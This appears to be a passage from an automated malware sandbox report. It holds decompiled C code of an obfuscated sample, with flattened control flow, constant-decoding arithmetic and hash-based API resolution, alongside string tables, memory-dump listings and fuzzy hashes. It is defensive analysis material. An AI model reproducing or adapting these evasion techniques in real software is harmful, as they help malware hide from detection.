				_v1696 = _v1696 + 0xffffd343;
				_v1696 = _v1696 >> 5;
				_v1696 = _v1696 / _t514;
				_v1696 = _v1696 ^ 0x00097c64;
				_v1608 = 0x3d653b;
				_t515 = 9;
				_v1608 = _v1608 / _t515;
				_v1608 = _v1608 ^ 0x0008d29b;
				_v1704 = 0xea48bf;
				_v1704 = _v1704 << 1;
				_v1704 = _v1704 | 0x6dbc893f;
				_v1704 = _v1704 << 0xf;
				_v1704 = _v1704 ^ 0x4cb93698;
				_v1592 = 0x60e14f;
				_v1592 = _v1592 + 0xffffa0eb;
				_v1592 = _v1592 ^ 0x006da1fe;
				_v1660 = 0xb84cd6;
				_v1660 = _v1660 << 0xe;
				_v1660 = _v1660 | 0xae469af4;
				_v1660 = _v1660 ^ 0xbf747a00;
				_v1628 = 0x2ae679;
				_v1628 = _v1628 + 0xffffe76d;
				_v1628 = _v1628 + 0xffff966a;
				_v1628 = _v1628 ^ 0x002af9b0;
				_v1600 = 0x5dc215;
				_v1600 = _v1600 + 0xffff301b;
				_v1600 = _v1600 ^ 0x00549305;
				_v1652 = 0xe3917b;
				_v1652 = _v1652 << 0xd;
				_v1652 = _v1652 ^ 0xb15aed13;
				_v1652 = _v1652 ^ 0xc37cfd68;
				_v1636 = 0xa59055;
				_v1636 = _v1636 + 0xffffdd12;
				_v1636 = _v1636 ^ 0x00a1f596;
				_v1724 = 0xf0f3b7;
				_v1724 = _v1724 << 0xb;
				_t516 = 0x55;
				_v1724 = _v1724 / _t516;
				_v1724 = _v1724 ^ 0x0c3c14bd;
				_v1724 = _v1724 ^ 0x0da6b3ec;
				_v1604 = 0x70e6ad;
				_t517 = 0x33;
				_t498 = _v1576;
				_v1604 = _v1604 / _t517;
				_v1604 = _v1604 ^ 0x0001b026;
				_v1680 = 0x336eab;
				_v1680 = _v1680 + 0x2490;
				_v1680 = _v1680 + 0xffffdec5;
				_v1680 = _v1680 | 0xc166c96f;
				_v1680 = _v1680 ^ 0xc1736b65;
				_v1688 = 0x11f1a3;
				_v1688 = _v1688 * 0x68;
				_v1688 = _v1688 + 0xffffb309;
				_v1688 = _v1688 + 0xed48;
				_v1688 = _v1688 ^ 0x074f9ff6;
				while(1) {
					L1:
					_t518 = 0x5c;
					while(1) {
						L2:
						_t475 = 0x8f5cf45;
						do {
							L3:
							if(_t578 == 0xb6e718) {
								_t476 = E00BD0AD3(_v1648, _v1728, __eflags);
								_t520 = 0xbb149c;
								__eflags = E00BB2089(_v1672, _v1624, _t520, _v1632, _v1712, _v1720, _t520,  &_v1572, _t520, _t520, _v1596, _v1640, _v1588, _t476);
								_t578 =  ==  ? 0x8f5cf45 : 0xf961a4b;
								E00BC2EED(_v1696, _v1608, _v1704, _t476);
								_t583 =  &(_t583[0xf]);
								_t475 = 0x8f5cf45;
								_t518 = 0x5c;
								goto L17;
							} else {
								if(_t578 == 0x2411a89) {
									E00BD2A25(_v1604, _v1680, _v1572, _v1688);
								} else {
									if(_t578 == 0x2d3ef18) {
										_push(0xbb144c);
										_t483 = E00BD0AD3(_v1580, _v1584, __eflags);
										E00BD2C16( &_v520, __eflags);
										E00BCB062( &_v1560, __eflags,  *0xbd5bd8 + 0x238, _v1668, _v1676, _t483, _v1620, 0x104, _v1684,  *0xbd5bd8 + 0x30,  &_v520,  &_v1040, _v1716);
										E00BC2EED(_v1736, _v1740, _v1656, _t483);
										_t583 =  &(_t583[0xe]);
										_t578 = 0x4a5ec26;
										goto L1;
									} else {
										if(_t578 == 0x4a5ec26) {
											_t500 =  *0xbd5bd8 + 0x30;
											while(1) {
												__eflags =  *_t500 - _t518;
												if(__eflags == 0) {
													break;
												}
												_t500 = _t500 + 2;
												__eflags = _t500;
											}
											_t498 = _t500 + 2;
											_t578 = 0xb6e718;
											goto L2;
										} else {
											if(_t578 == _t475) {
												_t495 = E00BC39E4(_v1600, _v1652, _v1572, _v1636, 2 + E00BBF14F(_v1592,  &_v1560, _v1660, _v1628) * 2,  &_v1560, _v1700, _v1724, _t498);
												_t583 =  &(_t583[0xa]);
												__eflags = _t495;
												_t578 = 0x2411a89;
												_v1576 = 0 | __eflags == 0x00000000;
												while(1) {
													L1:
													_t518 = 0x5c;
													goto L2;
												}
											} else {
												if(_t578 != 0xb4e665b) {
													goto L17;
												} else {
													_push(_t518);
													E00BBE259(_v1612, _v1616, _v1692, _v1732, _t518, _t518,  &_v1040, _v1708, _v1644);
													_t583 =  &(_t583[8]);
													_t578 = 0x2d3ef18;
													while(1) {
														L1:
														_t518 = 0x5c;
														L2:
														_t475 = 0x8f5cf45;
														goto L3;
													}
												}
											}
										}
									}
								}
							}
							L20:
							return _v1576;
							L17:
							__eflags = _t578 - 0xf961a4b;
						} while (__eflags != 0);
						goto L20;
					}
				}
			}

0x00bb3e3b
0x00bb3e41
0x00bb3e4e
0x00bb3e57
0x00bb3e63
0x00bb3e6a
0x00bb3e78
0x00bb3e7d
0x00bb3e86
0x00bb3e91
0x00bb3e9c
0x00bb3ea4
0x00bb3ea9
0x00bb3eb1
0x00bb3eb9
0x00bb3ec5
0x00bb3eca
0x00bb3ed0
0x00bb3ed8
0x00bb3ee0
0x00bb3ee8
0x00bb3ef0
0x00bb3ef8
0x00bb3f00
0x00bb3f08
0x00bb3f13
0x00bb3f1b
0x00bb3f26
0x00bb3f33
0x00bb3f36
0x00bb3f3a
0x00bb3f42
0x00bb3f4a
0x00bb3f52
0x00bb3f62
0x00bb3f66
0x00bb3f6e
0x00bb3f73
0x00bb3f7b
0x00bb3f83
0x00bb3f8f
0x00bb3f94
0x00bb3f9a
0x00bb3fa2
0x00bb3faa
0x00bb3fb2
0x00bb3fbe
0x00bb3fc1
0x00bb3fc5
0x00bb3fcd
0x00bb3fd8
0x00bb3fe3
0x00bb3fee
0x00bb3ff9
0x00bb4004
0x00bb400f
0x00bb4020
0x00bb4023
0x00bb4027
0x00bb402c
0x00bb4034
0x00bb403c
0x00bb4046
0x00bb404a
0x00bb4052
0x00bb405a
0x00bb4062
0x00bb406a
0x00bb4072
0x00bb407d
0x00bb4093
0x00bb409a
0x00bb40a5
0x00bb40b1
0x00bb40b6
0x00bb40c0
0x00bb40c5
0x00bb40cb
0x00bb40cf
0x00bb40d7
0x00bb40df
0x00bb40e4
0x00bb40ec
0x00bb40f4
0x00bb40fc
0x00bb4104
0x00bb410c
0x00bb4114
0x00bb411c
0x00bb4124
0x00bb4130
0x00bb4135
0x00bb413f
0x00bb4144
0x00bb414a
0x00bb4152
0x00bb415a
0x00bb4162
0x00bb416a
0x00bb416f
0x00bb4177
0x00bb417f
0x00bb4187
0x00bb418c
0x00bb4194
0x00bb41a1
0x00bb41a2
0x00bb41ac
0x00bb41b0
0x00bb41b5
0x00bb41bd
0x00bb41ca
0x00bb41d5
0x00bb41dd
0x00bb41e8
0x00bb41f6
0x00bb41fb
0x00bb4204
0x00bb420f
0x00bb421a
0x00bb4222
0x00bb422a
0x00bb4237
0x00bb423a
0x00bb423e
0x00bb4246
0x00bb424e
0x00bb425b
0x00bb4267
0x00bb426b
0x00bb4273
0x00bb427e
0x00bb4289
0x00bb4294
0x00bb42a7
0x00bb42aa
0x00bb42b1
0x00bb42bc
0x00bb42c4
0x00bb42cc
0x00bb42d9
0x00bb42dd
0x00bb42e5
0x00bb42f7
0x00bb42fa
0x00bb4301
0x00bb430c
0x00bb4314
0x00bb4318
0x00bb4320
0x00bb4325
0x00bb432d
0x00bb4338
0x00bb4343
0x00bb434e
0x00bb4356
0x00bb435b
0x00bb4363
0x00bb436b
0x00bb4376
0x00bb4381
0x00bb438c
0x00bb4397
0x00bb43a2
0x00bb43ad
0x00bb43b8
0x00bb43c0
0x00bb43c5
0x00bb43cd
0x00bb43d5
0x00bb43e5
0x00bb43ef
0x00bb43fc
0x00bb4404
0x00bb440f
0x00bb4414
0x00bb441a
0x00bb4422
0x00bb442a
0x00bb443c
0x00bb443f
0x00bb4446
0x00bb444d
0x00bb4458
0x00bb4460
0x00bb4468
0x00bb4470
0x00bb4478
0x00bb4480
0x00bb448d
0x00bb4491
0x00bb4499
0x00bb44a1
0x00bb44a9
0x00bb44a9
0x00bb44ab
0x00bb44ac
0x00bb44ac
0x00bb44ac
0x00bb44b1
0x00bb44b1
0x00bb44b3
0x00bb4661
0x00bb4666
0x00bb46aa
0x00bb46c6
0x00bb46c9
0x00bb46ce
0x00bb46d1
0x00bb46d8
0x00000000
0x00bb44b9
0x00bb44bf
0x00bb46fd
0x00bb44c5
0x00bb44cb
0x00bb45c3
0x00bb45c8
0x00bb45d6
0x00bb462d
0x00bb4642
0x00bb4647
0x00bb464a
0x00000000
0x00bb44d1
0x00bb44d7
0x00bb459e
0x00bb45a6
0x00bb45a6
0x00bb45a9
0x00000000
0x00000000
0x00bb45a3
0x00bb45a3
0x00bb45a3
0x00bb45ab
0x00bb45ae
0x00000000
0x00bb44dd
0x00bb44df
0x00bb4578
0x00bb457f
0x00bb4582
0x00bb4584
0x00bb458c
0x00bb44a9
0x00bb44a9
0x00bb44ab
0x00000000
0x00bb44ab
0x00bb44e1
0x00bb44e7
0x00000000
0x00bb44ed
0x00bb44ed
0x00bb4516
0x00bb451b
0x00bb451e
0x00bb44a9
0x00bb44a9
0x00bb44ab
0x00bb44ac
0x00bb44ac
0x00000000
0x00bb44ac
0x00bb44a9
0x00bb44e7
0x00bb44df
0x00bb44d7
0x00bb44cb
0x00bb44bf
0x00bb4704
0x00bb4715
0x00bb46d9
0x00bb46d9
0x00bb46d9
0x00000000
0x00bb46e5
0x00bb44ac

Strings

d|, xrefs: 00BB42DD
;e=, xrefs: 00BB42E5
H, xrefs: 00BB4499
O`, xrefs: 00BB432D
q", xrefs: 00BB421A
.F|, xrefs: 00BB3E57
}, xrefs: 00BB3F00
y*, xrefs: 00BB436B
^1+, xrefs: 00BB4194
{oS\, xrefs: 00BB417F
>&1Z, xrefs: 00BB3F66

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: }$.F|$;e=$>&1Z$H$O`$^1+$d|$y*${oS\$q"
API String ID: 0-1245192883
Opcode ID: 870068a1771a231aed6006771c50ce16e13413472ae20ee7617fd60b01cc1b6b
Instruction ID: fd1fc2a534d97373be0f7c6b8009a2e459e91c578c91c4a600c3889ab788fb30
Opcode Fuzzy Hash: 870068a1771a231aed6006771c50ce16e13413472ae20ee7617fd60b01cc1b6b
Instruction Fuzzy Hash: E62212715083809FE368CF25C98AA9BBBF2FBC5754F10891DF29986260D7B59949CF03

Uniqueness

Uniqueness Score: -1.00%

Function 6ED15EA0, Relevance: 10.9, Strings: 8, Instructions: 927COMMON

Download Yara Rule

Strings

_, xrefs: 6ED1A34B
" fn( -> = { }truefalse{0x, xrefs: 6ED1A519
_, xrefs: 6ED1A35B
H, xrefs: 6ED15FD9
)C,, xrefs: 6ED1A1FD
{recursion limit reached}{invalid syntax}, xrefs: 6ED1A445
called `Option::unwrap()` on a `None` value, xrefs: 6ED1A6AF
?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6ED16309

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: " fn( -> = { }truefalse{0x$)C,$?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$H$_$_$called `Option::unwrap()` on a `None` value${recursion limit reached}{invalid syntax}
API String ID: 0-4270729952
Opcode ID: a4060751f64df8239697267b39a348b10e181171d96b486e39562845cf5f9d17
Instruction ID: 4c684facc0add6243d598cd3bd59245e39238acdb2cdb1cedf3cea54f6df05b4
Opcode Fuzzy Hash: a4060751f64df8239697267b39a348b10e181171d96b486e39562845cf5f9d17
Instruction Fuzzy Hash: 5462F1B071C341CFEB548FA5E4507AEB7E2AF85314F04892DE8A98B385E775D849CB42

Uniqueness

Uniqueness Score: -1.00%

Function 6ED175F4, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 423COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6ED17723
__aulldiv.LIBCMT ref: 6ED17733

Strings

bool, xrefs: 6ED1788B
{recursion limit reached}{invalid syntax}, xrefs: 6ED17C06
called `Option::unwrap()` on a `None` value, xrefs: 6ED179BC
?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6ED17602, 6ED17A59

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldiv__aullrem
String ID: ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$bool$called `Option::unwrap()` on a `None` value${recursion limit reached}{invalid syntax}
API String ID: 3839614884-433696047
Opcode ID: b72f062f1b6964d78008acaf7ee82f751419d99a9f96124658a6acc6eb430273
Instruction ID: 21239cb732654127c575324156eb8a4289e2e6d1ffe22e7e818f79eda01ef3cc
Opcode Fuzzy Hash: b72f062f1b6964d78008acaf7ee82f751419d99a9f96124658a6acc6eb430273
Instruction Fuzzy Hash: 12E1F771A0C741AFE704CFA8D49079AB7F1AF86314F14896DD8958B3E1D734D846CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00BCD5FE, Relevance: 10.6, Strings: 8, Instructions: 608
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E00BCD5FE(intOrPtr* __ecx, signed int __edx) {
				char _v128;
				char _v256;
				char _v288;
				signed int _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				signed int _v304;
				signed int _v308;
				unsigned int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				unsigned int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				unsigned int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				intOrPtr* _v488;
				unsigned int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				unsigned int _v548;
				signed int _v552;
				signed int _v556;
				signed int _t638;
				void* _t643;
				void* _t645;
				signed int _t648;
				void* _t649;
				void* _t684;
				signed int _t686;
				int _t688;
				signed int _t690;
				signed int _t691;
				signed int _t695;
				intOrPtr* _t696;
				void* _t698;
				void* _t708;
				void* _t713;
				signed int _t719;
				void* _t756;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t787;
				void* _t789;
				void* _t790;
				void* _t793;
				void* _t794;
				signed int _t799;
				signed int _t800;
				signed int* _t801;
				signed int* _t802;
				void* _t807;

				_t696 = __ecx;
				_t801 =  &_v556;
				_v292 = _v292 & 0x00000000;
				_v296 = 0x24ef18;
				_v432 = 0x6807f6;
				_v432 = _v432 + 0xc1d0;
				_v432 = _v432 | 0x4e6dc4da;
				_v432 = _v432 ^ 0x4e6dcdde;
				_v352 = 0x58a8af;
				_v352 = _v352 + 0x4945;
				_v352 = _v352 ^ 0x005e8e6e;
				_v332 = 0x47a7e9;
				_v304 = __edx;
				_t793 = 0xc3ba346;
				_v488 = __ecx;
				_t799 = 0x51;
				_v332 = _v332 / _t799;
				_v332 = _v332 ^ 0x000a6999;
				_v388 = 0xce3530;
				_v388 = _v388 + 0xffff994b;
				_v388 = _v388 + 0xfcf;
				_v388 = _v388 ^ 0x00cb1c88;
				_v524 = 0xb2cc76;
				_v524 = _v524 + 0x9146;
				_v524 = _v524 + 0xffffbb7f;
				_v524 = _v524 ^ 0x8c867547;
				_v524 = _v524 ^ 0x8c346e6b;
				_v412 = 0xfc8e04;
				_v412 = _v412 >> 8;
				_t774 = 0x71;
				_v412 = _v412 * 0x3a;
				_v412 = _v412 ^ 0x00372199;
				_v444 = 0xfa5ff8;
				_v444 = _v444 ^ 0x860f3dec;
				_v444 = _v444 << 0x10;
				_v444 = _v444 ^ 0x621f63b2;
				_v328 = 0xb2bda6;
				_v328 = _v328 | 0xd21dda15;
				_v328 = _v328 ^ 0xd2bc271a;
				_v548 = 0x3b49b6;
				_v548 = _v548 >> 0xb;
				_v548 = _v548 + 0xbb3e;
				_v548 = _v548 + 0xffff56dd;
				_v548 = _v548 ^ 0x000cff07;
				_v456 = 0x565647;
				_v456 = _v456 + 0xf716;
				_v456 = _v456 + 0x3321;
				_v456 = _v456 ^ 0x00583957;
				_v492 = 0xbb53b3;
				_v492 = _v492 / _t774;
				_v492 = _v492 >> 0xa;
				_v492 = _v492 >> 0xf;
				_v492 = _v492 ^ 0x0002bbd3;
				_v380 = 0x5ea3ed;
				_t775 = 0x12;
				_v380 = _v380 / _t775;
				_v380 = _v380 ^ 0x0002b3f6;
				_v428 = 0xc5e382;
				_v428 = _v428 + 0x10b;
				_v428 = _v428 * 0x3d;
				_v428 = _v428 ^ 0x2f2d31ce;
				_v384 = 0x7e50f1;
				_v384 = _v384 + 0xffffd7b9;
				_v384 = _v384 ^ 0x4dd639cf;
				_v384 = _v384 ^ 0x4da37294;
				_v516 = 0x676c72;
				_t776 = 0x48;
				_v516 = _v516 / _t776;
				_v516 = _v516 << 0xb;
				_t777 = 0x77;
				_v516 = _v516 * 0x33;
				_v516 = _v516 ^ 0x4a114b66;
				_v440 = 0x7c8da1;
				_v440 = _v440 + 0x76bb;
				_v440 = _v440 + 0xffffa3ac;
				_v440 = _v440 ^ 0x0070fb01;
				_v448 = 0xff25f5;
				_v448 = _v448 / _t777;
				_v448 = _v448 << 8;
				_v448 = _v448 ^ 0x0224052d;
				_v544 = 0xf7834f;
				_v544 = _v544 << 0xf;
				_v544 = _v544 + 0xbbb1;
				_v544 = _v544 | 0x06550611;
				_v544 = _v544 ^ 0xc7f9d9cf;
				_v484 = 0xc145f2;
				_v484 = _v484 | 0x1a332a8f;
				_v484 = _v484 + 0xffff0278;
				_v484 = _v484 ^ 0x1af43a4d;
				_v312 = 0x4b1d29;
				_v312 = _v312 >> 2;
				_v312 = _v312 ^ 0x00177a04;
				_v336 = 0x360ace;
				_v336 = _v336 ^ 0xc80cb5e9;
				_v336 = _v336 ^ 0xc839ddc7;
				_v528 = 0xc44b32;
				_v528 = _v528 | 0x4383368e;
				_v528 = _v528 ^ 0x03d39e25;
				_v528 = _v528 ^ 0x53d26fc1;
				_v528 = _v528 ^ 0x13cfd90c;
				_v536 = 0xc858c;
				_t778 = 0x1a;
				_v536 = _v536 * 0xa;
				_v536 = _v536 | 0x3f6cb10e;
				_v536 = _v536 + 0x8b75;
				_v536 = _v536 ^ 0x3f749682;
				_v372 = 0xe3b868;
				_v372 = _v372 >> 0xb;
				_v372 = _v372 ^ 0x000877a5;
				_v520 = 0x43f6c5;
				_v520 = _v520 ^ 0xab5b9b7f;
				_v520 = _v520 / _t778;
				_v520 = _v520 | 0x87a4b1c4;
				_v520 = _v520 ^ 0x87bb68a1;
				_v376 = 0xa66ec3;
				_v376 = _v376 | 0x8d13b12a;
				_v376 = _v376 ^ 0x8dbc5e75;
				_v452 = 0xb2761d;
				_v452 = _v452 | 0x8e13417f;
				_v452 = _v452 >> 4;
				_v452 = _v452 ^ 0x08ea57ac;
				_v420 = 0x566571;
				_v420 = _v420 + 0x92bf;
				_v420 = _v420 >> 0x10;
				_v420 = _v420 ^ 0x000d4db7;
				_v508 = 0xacfdd3;
				_v508 = _v508 | 0x5370955f;
				_t779 = 0x4a;
				_v508 = _v508 / _t779;
				_v508 = _v508 << 0xe;
				_v508 = _v508 ^ 0xa37f5948;
				_v532 = 0x5b36aa;
				_t780 = 0x66;
				_v532 = _v532 / _t780;
				_v532 = _v532 + 0x9645;
				_v532 = _v532 + 0x7571;
				_v532 = _v532 ^ 0x000463d2;
				_v460 = 0xcd536;
				_v460 = _v460 | 0xa48cf865;
				_t781 = 0x3c;
				_v460 = _v460 * 0x73;
				_v460 = _v460 ^ 0xeb561116;
				_v360 = 0xd5dba;
				_v360 = _v360 / _t781;
				_v360 = _v360 ^ 0x00005c14;
				_v404 = 0xa212a4;
				_v404 = _v404 | 0x58704cfe;
				_t782 = 0x60;
				_v404 = _v404 / _t782;
				_v404 = _v404 ^ 0x00e6e781;
				_v500 = 0x3c0644;
				_v500 = _v500 << 2;
				_t690 = 0x58;
				_v500 = _v500 / _t690;
				_t783 = 0x6d;
				_v500 = _v500 / _t783;
				_v500 = _v500 ^ 0x00078705;
				_v468 = 0xa3c72f;
				_v468 = _v468 * 0x48;
				_v468 = _v468 ^ 0xb2004da4;
				_v468 = _v468 ^ 0x9c15ecbc;
				_v344 = 0xe572d1;
				_v344 = _v344 >> 0xc;
				_v344 = _v344 ^ 0x0006c657;
				_v436 = 0xf66be8;
				_v436 = _v436 + 0xffff754a;
				_v436 = _v436 | 0xbfbde8c6;
				_v436 = _v436 ^ 0xbff52719;
				_v476 = 0x9cf726;
				_v476 = _v476 | 0xf4405671;
				_v476 = _v476 << 8;
				_v476 = _v476 ^ 0xdcf65da8;
				_v396 = 0xb1198c;
				_v396 = _v396 | 0x5afbbeef;
				_v396 = _v396 ^ 0x5af84ad6;
				_v556 = 0xa069a;
				_v556 = _v556 + 0xffff3d5d;
				_v556 = _v556 | 0xabf4caf6;
				_v556 = _v556 * 0x66;
				_v556 = _v556 ^ 0x871ad044;
				_v320 = 0xeddd1e;
				_v320 = _v320 + 0xffff6c47;
				_v320 = _v320 ^ 0x00e224c3;
				_v552 = 0xa16b02;
				_v552 = _v552 >> 0xf;
				_v552 = _v552 << 4;
				_v552 = _v552 ^ 0x54d73f19;
				_v552 = _v552 ^ 0x54d75985;
				_v464 = 0xdf0941;
				_v464 = _v464 + 0xcb8c;
				_v464 = _v464 >> 9;
				_v464 = _v464 ^ 0x00056a58;
				_v472 = 0xcffc0b;
				_v472 = _v472 + _t799;
				_v472 = _v472 ^ 0xefa8c7c3;
				_v472 = _v472 ^ 0xef6bd9c6;
				_v324 = 0x489401;
				_v324 = _v324 + 0x2f52;
				_v324 = _v324 ^ 0x00492e44;
				_v368 = 0xd20175;
				_v368 = _v368 ^ 0x642ec617;
				_v368 = _v368 ^ 0x64f7b4e7;
				_v540 = 0xdf2574;
				_v540 = _v540 << 0xb;
				_v540 = _v540 >> 3;
				_t784 = 0x34;
				_v540 = _v540 / _t784;
				_v540 = _v540 ^ 0x00965a73;
				_v316 = 0xede385;
				_v316 = _v316 << 2;
				_v316 = _v316 ^ 0x03ba3859;
				_v512 = 0x14522c;
				_t785 = 0x29;
				_v512 = _v512 / _t785;
				_v512 = _v512 + 0xfffff241;
				_v512 = _v512 | 0x236c33b5;
				_v512 = _v512 ^ 0x236845c9;
				_v348 = 0x5f65e8;
				_v348 = _v348 ^ 0x05ce3e22;
				_v348 = _v348 ^ 0x059645b8;
				_v408 = 0xe58394;
				_v408 = _v408 + 0xe0f7;
				_t786 = 0x52;
				_v408 = _v408 / _t786;
				_v408 = _v408 ^ 0x000db681;
				_v496 = 0x46a785;
				_v496 = _v496 ^ 0x49997b83;
				_v496 = _v496 + 0xffff3964;
				_v496 = _v496 << 0xe;
				_v496 = _v496 ^ 0xc55c07fb;
				_v504 = 0xc28d72;
				_v504 = _v504 / _t690;
				_v504 = _v504 << 0xc;
				_v504 = _v504 >> 9;
				_v504 = _v504 ^ 0x00189682;
				_v340 = 0x971023;
				_t787 = 0x3f;
				_v340 = _v340 / _t787;
				_v340 = _v340 ^ 0x0007e653;
				_v480 = 0x5ee1b;
				_v480 = _v480 ^ 0x94dca5bc;
				_v480 = _v480 + 0xa3cd;
				_v480 = _v480 ^ 0x94db08db;
				_v392 = 0xf65325;
				_v392 = _v392 + 0xe39f;
				_v392 = _v392 >> 0xa;
				_v392 = _v392 ^ 0x000af9f4;
				_v400 = 0xbac066;
				_v400 = _v400 ^ 0xd78d05c4;
				_v400 = _v400 >> 0xb;
				_v400 = _v400 ^ 0x001d17a0;
				_v356 = 0x9ce01f;
				_v356 = _v356 | 0xeb61c9d9;
				_v356 = _v356 ^ 0xebf5013f;
				_v416 = 0x59bba4;
				_v416 = _v416 + 0xffffa4e4;
				_v416 = _v416 + 0xffff160d;
				_v416 = _v416 ^ 0x0052dc60;
				_t691 = _v304;
				_t800 = _v304;
				_v424 = 0xb9ecd0;
				_v424 = _v424 * 0x33;
				_v424 = _v424 * 0x48;
				_v424 = _v424 ^ 0x6ad5bf37;
				_v364 = 0x5d0977;
				_v364 = _v364 ^ 0xa81ddbfb;
				_v364 = _v364 ^ 0xa8418dcc;
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t807 = _t793 - 0x4450dbe;
							if(_t807 > 0) {
								break;
							}
							if(_t807 == 0) {
								_t789 = 0x4000;
								_push(_t696);
								_t648 = E00BC6F53(0x4000);
								_v308 = _t648;
								__eflags = _t648;
								if(__eflags == 0) {
									return _t648;
								}
								_t793 = 0x130c6e5;
								L11:
								_t696 = _v488;
								while(1) {
									L1:
									goto L2;
								}
							}
							if(_t793 == 0x130c6e5) {
								_push(0xbb17d4);
								_t649 = E00BD0AD3(_v508, _v532, __eflags);
								_push( &_v256);
								_push(_t649);
								_push(_t789);
								_push(_v308);
								 *((intOrPtr*)(E00BBDFB1(0xae2a7e8d, 0x13a)))();
								E00BC2EED(_v460, _v360, _v404, _t649);
								_t801 =  &(_t801[6]);
								_t793 = 0x1af53ca;
								goto L11;
							}
							if(_t793 == 0x13fc339) {
								E00BBF699(_v356, _v308, _v416, _v424, _v364);
								return 0;
							}
							if(_t793 == 0x1af53ca) {
								_t789 = _t789 +  *((intOrPtr*)(_t696 + 4));
								_push(_t696);
								_t800 = E00BC6F53(_t789);
								__eflags = _t800;
								_t645 = 0xd5662cb;
								_t696 = _v488;
								_t793 =  !=  ? 0xd5662cb : 0x13fc339;
								continue;
							}
							if(_t793 == 0x34ad1e7) {
								E00BC4626( *_t696,  *((intOrPtr*)(_t696 + 4)), _t691, _v324, _v368, _v540, _v316);
								_t696 = _v488;
								_t801 =  &(_t801[5]);
								_t793 = 0xeed25b2;
								_t691 = _t691 +  *((intOrPtr*)(_t696 + 4));
								goto L1;
							}
							if(_t793 != 0x375e34a) {
								goto L31;
							}
							_push(_t696);
							_push(4);
							_push(_t696);
							_push(_t696);
							_t708 = 0x10;
							_t789 = E00BC2CCF(_t708);
							_push( &_v128);
							_push(_v516);
							_push(_t789);
							_push(0xb);
							E00BC8601(_v428, _v384);
							_t793 = 0x79ecab0;
							L10:
							_t801 =  &(_t801[8]);
							goto L11;
						}
						__eflags = _t793 - 0x79ecab0;
						if(_t793 == 0x79ecab0) {
							_t794 =  &_v256;
							_push(_t696);
							_push(8);
							_push(_t696);
							_push(_t696);
							_push(0x10);
							_pop(0);
							_t756 = E00BC2CCF(0);
							_t802 =  &(_t801[4]);
							_t638 = _v432;
							__eflags = _t638 - _t756;
							if(_t638 < _t756) {
								_t773 = _t756 - _t638;
								_t790 = _t794;
								_t719 = _t773 >> 1;
								__eflags = _t719;
								_t688 = memset(_t790, 0x2d002d, _t719 << 2);
								asm("adc ecx, ecx");
								_t794 = _t794 + _t773 * 2;
								memset(_t790 + _t719, _t688, 0);
								_t802 =  &(_t802[6]);
							}
							_push(0);
							_push(8);
							_push(0);
							_push(0);
							_t698 = 0x10;
							_t643 = E00BC2CCF(_t698);
							_push(_t794);
							_push(_v376);
							_t789 = _t643;
							_push(_t789);
							_push(0xb);
							E00BC8601(_v372, _v520);
							_t696 = _v488;
							_t801 =  &(_t802[8]);
							_t793 = 0x4450dbe;
							_t645 = 0xd5662cb;
							goto L31;
						}
						__eflags = _t793 - 0xc3ba346;
						if(__eflags == 0) {
							_t793 = 0xeb2477a;
							goto L2;
						}
						__eflags = _t793 - _t645;
						if(_t793 == _t645) {
							_push(0xbb1824);
							_v300 = _t789 + _t800;
							_t691 = E00BBE20F( &_v128, __eflags,  &_v288, _t789 + _t800 - _t800, _v476,  &_v256, E00BB54C0(_v344, _v436), _v396, _v556, _v320) + _t800;
							E00BC2EED(_v552, _v464, _v472, _t668);
							_t801 =  &(_t801[0xb]);
							_t793 = 0x34ad1e7;
							goto L11;
						}
						__eflags = _t793 - 0xeb2477a;
						if(_t793 == 0xeb2477a) {
